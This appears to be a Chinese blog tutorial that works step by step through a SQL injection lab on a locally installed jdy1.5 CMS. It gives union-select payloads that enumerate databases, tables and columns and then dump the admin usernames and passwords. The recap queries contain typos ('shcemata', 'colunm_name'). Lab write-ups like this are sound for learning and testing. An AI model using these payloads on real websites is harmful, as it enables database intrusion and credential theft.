SQL注入实战---jdy1.5

环境搭建

这里使用的windows2003+phpstudy2018+sdy1.5
我们解压sdy1.5至phpstudy下WWW文件内，在浏览器中输入127.0.0.1/sdy1.5进行安装
然后就进入到了首页

1.观察当前页面的URL：http://192.168.50.100/jdy1.5/typeid.php?typeid=2

我们发现此处的typeid特别像此前sql-lab中的id参数，可以尝试一下注入。
输入命令： ?typeid=2 and 1=1
观察到页面没有变化

输入命令： ?typeid=2 and 1=2
此时我们观察出与以前的页面发生了变化，可以断定此处存在 数字型的SQL注入。（所以不用考虑参数闭合的问题）

2.

此时，根据往常的思路，我们通过order by 语句判断出数据库的列数。
输入命令：?typeid =2 order by 5
?typeid = 2 order by 6
5正常回显，6错误回显，判断出列数为5.
3、我们以联合查询（union select）为例，观察回显位置。

4、构造语句查看当前数据库

在进行爆库爆表等等操作之前，先来回忆一下这些核心语句。
information_schema 系统默认数据库
三个重要的表
schemata(schema_name)
tables(table_schema,table_name)
columns(table_schema,table_name,column_name)

select schema_name from information_schema.schemata; 爆库
select table_name from information_schema.shcemata where table_schema=‘dvwa‘; 爆表
select column_name from information_schema.columns where table_name=‘users‘ and colunm_name =‘dvwa‘;爆列
select username,password from dvwa.users;爆内容

4、爆库

union select 1,group_concat(schema_name),3,4,5 from information_schema.schemata

6、爆表

union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=0x6a6479636d73

此时数据库jdycm 不可以直接使用需要将其转换成十六进制或者依旧用datbase()代替。

表名如下：
jdy_admin,jdy_kh,jdy_leavewords,jdy_newscontent,jdy_newstype,jdy_settings

7、爆列

union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema=database() and table_name=0x6a64795f61646d696e

列名 id,username,password,qx,addtime

8、爆字段 union select 1,group_concat(username,0x7e,password),3,4,5 from jdycms.jdy_admin

相关阅读:
maven 构建 war文件&&Glassfish运行+部署war文件+访问（命令行模式）
配置Glassfish服务器、部署Java web项目、Maven安装配置及JDK版本匹配性问题
配置apache-maven-3.6.0时所遇到的坑（二）
配置apache-maven-3.6.0时所遇到的坑（一）
对Functional Language的认识
论Injection的前世今生
简单实现美团手机版应用源码
WindowsPhone8可缩放图片控件的实现
MallBuilder 多用户商城管理系统 v5.8.1.1
Windows Phone 带文本信息的进度条

原文地址：https://www.cnblogs.com/xingyuner/p/12815189.html